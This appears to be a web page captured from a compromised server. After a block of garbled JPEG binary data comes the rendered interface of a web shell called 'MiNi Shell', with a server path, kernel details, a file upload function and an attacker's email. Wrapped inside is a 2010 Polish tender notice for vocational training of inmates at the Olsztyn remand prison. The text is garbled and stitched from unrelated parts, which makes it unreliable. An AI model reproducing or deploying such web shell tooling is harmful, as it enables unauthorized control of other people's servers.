JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100416/109168-N-2010.html

<p class="kh_header"><b>Olsztyn: Zamówienie na usługę  szkoleniową w części 1 kurs hydraulik dla 8 osób, w części 2 kurs fryzjer męski - grupa I dla 4 osób ,w części 3 kurs fryzjer męski - grupa II dla 4 osób, w części 4 kurs brukarz dla 8 osób oraz szkoleń aktywizacyjno - wzmacniających</b><br>
<b>Numer ogłoszenia: 109168 - 2010; data zamieszczenia: 16.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Piłsudskiego 3, 10-575 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5248600, faks 089 5248638.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zamówienie na usługę  szkoleniową w części 1 kurs hydraulik dla 8 osób, w części 2 kurs fryzjer męski - grupa I dla 4 osób ,w części 3 kurs fryzjer męski - grupa II dla 4 osób, w części 4 kurs brukarz dla 8 osób oraz szkoleń aktywizacyjno - wzmacniających.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu w zawodzie hydraulik dla 8 osób w części 1,  kursu w zawodzie fryzjer męski - grupa I dla 4 osób w części 2, kursu w zawodzie fryzjer męski - grupa II dla 4 osób w części 3, kursu w zawodzie brukarz dla 8 osób w części 4 oraz odpowiednio do każdego z kursów, szkoleń aktywizacyjno - wzmacniających Beneficjentów Ostatecznych, którymi będą osadzeni w Areszcie Śledczym w Olsztynie. Projekt Aktywizacja społeczno zawodowa skazanych niepełnosprawnych oraz osób skazanych na karę pozbawienia wolności na podstawie art. 209 § 1 i art. 207 § 1  Kodeksu Karnego realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanego ze środków Europejskiego Funduszu Społecznego.
2. Kurs i szkolenie aktywizacyjno - wzmacniające odbywać się będą na terenie Oddziału Zewnętrznego Aresztu Śledczego w Olsztynie, przy ul. Opolskiej 42 w Olsztynie.
3. Zamawiający zapewnia miejsca do nauki teoretycznej i zajęć praktycznych zgodnie z przepisami p. poż., bhp oraz sprzęt zakupiony w ramach Projektu.
4. Wykonawca zobowiązany jest zapewnić na swój koszt materiały niezbędne do nauki zawodu m.in. skrypty, podręczniki, materiały papiernicze oraz przybory do pisania, odzież ochronną i środki ochrony indywidualnej oraz materiały niezbędne do przeprowadzenia kursu, których wartość nie może przekroczyć 40% ceny kursu.
.5. Wykonawca zobowiązany jest do przeprowadzenia egzaminu końcowego oraz powołania komisji egzaminacyjnej. Do składu komisji wykonawca powoła jednego przedstawiciela Zamawiającego. Czas trwania egzaminu nie wlicza się do czasu trwania kursu. Wykonawca poniesie koszty oraz w przypadku takiej konieczności ponowi koszty egzaminów końcowych.
6. Celem szkolenia jest nabycie przez uczestników wiedzy teoretycznej i praktycznych umiejętności niezbędnych do wykonywania zawodu zgodnego z tematyką i zakresem kursu oraz uzyskanie odpowiednich uprawnień do wykonywania tego zawodu. 
7. Kurs i szkolenie aktywizacyjno - wzmacniające winno obejmować 144 godzin zajęć teoretycznych i praktycznych (30 godzin zajęć teoretycznych, 90 godzin zajęć praktycznych oraz  24 godziny zajęć aktywizacyjno - wzmacniających).
8. Wykonawca sporządzi i dołączy Zamawiającemu do akceptacji program szkolenia, który winien być zgodny
z rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosła wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).
9. Szkolenie zakończy się egzaminem oraz wydaniem zaświadczeń potwierdzających ukończenie kursu oraz uzyskania kwalifikacji zawodowych zgodnych z programem kursu, według wzoru stanowiącego załącznik do rozporządzenia Ministra Edukacji i Nauki z 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosła wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216). Wydanie absolwentom kursu dokumentu ukończenia szkolenia winno zawierać informację o realizowaniu kursu w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.
9. Realizacja szkolenia powinna odbywać się zarówno w oparciu o nowoczesne metody i techniki dydaktyczno - pedagogiczne.
10. Materiały szkoleniowe oraz dokumenty należy oznakować poprzez umieszczenie logo UE i EFS, informacji o realizacji projektu Kapitał Ludzki - Narodowa Strategia Spójności oraz informacji o środkach współfinansowania projektu. Do dokumentów szkoleniowych należy załączyć pokwitowanie odbioru materiałów szkoleniowych, w którym zostaną wymienione materiały szkoleniowe otrzymane przez uczestników zgodnie z wykazem zawartym w ofercie.
11. Wykonawca zobowiązany jest do bieżącej, wewnętrznej kontroli szkolenia mającej na celu podnoszenie jakości szkolenia.
12. Wykonawca ubezpieczy każdego z uczestników w niezbędnym zakresie.
13. Wykonawca jest zobowiązany do przechowywania dokumentacji dotyczącej kursu do 2020 roku w sposób zapewniający dostępność, poufność i bezpieczeństwo.
14. Wykonawca zobowiązuje się do umożliwienia uprawnionym instytucjom zewnętrznym kontroli kursu sfinansowanego przez Zamawiającego ze środków EFS w zakresie i na zasadach wynikających z obowiązujących przepisów.
15. Wykonawca zapewni i przeprowadzi badania lekarskie zakwalifikowanym przez Zamawiającego osadzonym, niezbędne do podjęcia zatrudnienia odpowiednio w części 1 w zawodzie hydraulik  - 12 osób, w części 2 w zawodzie fryzjer  - 8 osób,  w części 3 w zawodzie fryzjer - 8 osób oraz  w części 4 w zawodzie brukarz - 16 osób..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Każdy z Wykonawców ma obowiązek złożyć następujące dokumenty potwierdzające spełnienie warunków udziału 
w postępowaniu:
1. oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Prawo zamówień publicznych, zgodne w treści ze wzorem stanowiącym załącznik nr 2 do specyfikacji,
2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzającego, że profil działalności wykonawcy odpowiada przedmiotowi zamówienia, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3. aktualny odpis z Rejestru Instytucji Szkoleniowych WUP, 
4. oświadczenie o spełnianiu wymogów dla organizatorów kształcenia określone w § 1 ust. 2 rozporządzenia Ministra Edukacji i Nauki z 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosła wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).
5.  aktualny wpis do ewidencji szkół i placówek niepublicznych (lub publicznych),
6. wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności według wzoru stanowiącego załącznik nr 3 do specyfikacji,
7. pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 5, wykonawca wskazał osoby, którymi będzie dysponował. Uwaga: dokument wymienione w ppkt. 2, 3, 4 i 6 mogą być przedstawione w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
8. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, 
że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Wykonawca złoży formularz ofertowy zgodny w treści ze wzorem stanowiącym załącznik nr 1 do specyfikacji.
3. Wraz z ofertą należy złożyć kalkulację kosztów. Warunki oraz sposób jego sporządzenia określone zostały w rozdziale XVI niniejszej specyfikacji Opis sposobu obliczenia ceny.
4. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy złożyć pełnomocnictwo wraz z zakresem umocowania, podpisane przez osobę (osoby) upoważnione do reprezentowania Wykonawcy.
5. Wykonawcy, którzy wspólnie ubiegać się będą o udzielenie zamówienia, zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych. W takim przypadku należy złożyć wraz z ofertą pełnomocnictwo z zakresem umocowania.
6. Każdy z podmiotów występujących wspólnie zobowiązany jest do złożenia dokumentów wymienionych w rozdziale IX pkt 1 ppkt 1 i 2.
7. Ze względu na specyfikę przedmiotu zamówienia zamawiający zastrzega, że całość zamówienia musi być wykonana przez Wykonawcę. W związku z tym Wykonawca nie może powierzyć zamówienia dla podwykonawcy.

X. Sposób porozumiewania się zamawiającego z wykonawcami oraz przekazywania oświadczeń i dokumentów.
1. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie lub faksem (adres oraz nr faksu zamawiającego został podany w rozdziale I specyfikacji).
2. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
3. Wybrany sposób przekazywania oświadczeń, zawiadomień, wniosków oraz informacji nie może ograniczać konkurencji; zawsze dopuszczalna jest pisemna, z zastrzeżeniem wyjątków przewidzianych w ustawie.
4. Adresatem oświadczeń, zawiadomień, wniosków oraz informacji, o których mowa w pkt. 1, a także zapytań do specyfikacji po stronie zamawiającego, są osoby wymienione w rozdziale XI specyfikacji.
5. Wykonawca może zwrócić się do z prośbą o wyjaśnienie treści specyfikacji istotnych warunków zamówienia, kierując swoje zapytanie na piśmie pod adresem zamawiającego, tak, aby dotarły one do niego nie później niż na 6 dni przed upływem terminu składania ofert. Zamawiający niezwłocznie prześle treść zapytania wraz wyjaśnieniami wszystkim Wykonawcą, którym doręczono specyfikację, bez ujawniania źródła zapytania oraz zamieści na stronie internetowej (www.sw.gov.pl).
6. W uzasadnionych przypadkach zamawiający może przed upływem terminu składania ofert, zmienić treść specyfikacji istotnych warunków zamówienia. Dokonaną zmianę specyfikacji zamawiający przekaże niezwłocznie na piśmie lub faksem wszystkim Wykonawcom, którym przekazano specyfikację istotnych warunków zamówienia. Dokonana zmianę specyfikacji zamawiający udostępni na stronie internetowej (www.sw.gov.pl).
7. Jeżeli w przedmiotowym postępowaniu zmiana treści specyfikacji istotnych warunków zamówienia prowadzi do zmiany treści ogłoszenia o zamówieniu, to zamawiający zamieszcza ogłoszenie o zmianie ogłoszenia w Biuletynie Zamówień Publicznych.
8. Jeżeli w wyniku zmiany treści specyfikacji istotnych warunków zamówienia nie prowadzącej do zmiany treści ogłoszenia o zamówieniu jest niezbędny dodatkowy czas na wprowadzenie zmian w ofertach, zamawiający przedłuży termin składania ofert. O przedłużeniu terminu składania ofert zamawiający niezwłocznie zawiadomi wszystkich wykonawców, którym przekazano specyfikację istotnych warunków zamówienia oraz umieści na stronie internetowej (www.sw.gov.pl).
9. Nie przewiduje się zebrania wszystkich wykonawców w celu wyjaśnienia wątpliwości dotyczących treści specyfikacji istotnych warunków zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Aresztu Śledczego w Olsztynie; al. Piłsudskiego 3; 10 - 575 Olsztyn
lub w postaci elektronicznej pod adresem strony www.sw.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2010 godzina 11:00, miejsce: Sekretariat Aresztu Śledczego w Olsztynie; al. Piłsudskiego 3; 10 - 575 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Aktywizacja społeczno zawodowa skazanych niepełnosprawnych oraz osób skazanych na karę pozbawienia wolności na podstawie art. 209 § 1 i art. 207 § 1  Kodeksu Karnego realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanego ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs hydraulik:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób - 8
Ilość godzin szkolenia teoretycznego - 30
Ilość godzin szkolenia praktycznego - 90
Ilość godzin szkolenia aktywizacyjno - wzmacniającego - 24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs fryzjer męski grupa I:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób - 4
Ilość godzin szkolenia teoretycznego - 30
Ilość godzin szkolenia praktycznego - 90
Ilość godzin szkolenia aktywizacyjno - wzmacniającego - 24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs fryzjer męski grupa II:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób - 4
Ilość godzin szkolenia teoretycznego - 30
Ilość godzin szkolenia praktycznego - 90
Ilość godzin szkolenia aktywizacyjno - wzmacniającego - 24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs brukarz:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób - 8
Ilość godzin szkolenia teoretycznego - 30
Ilość godzin szkolenia praktycznego - 90
Ilość godzin szkolenia aktywizacyjno - wzmacniającego - 24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com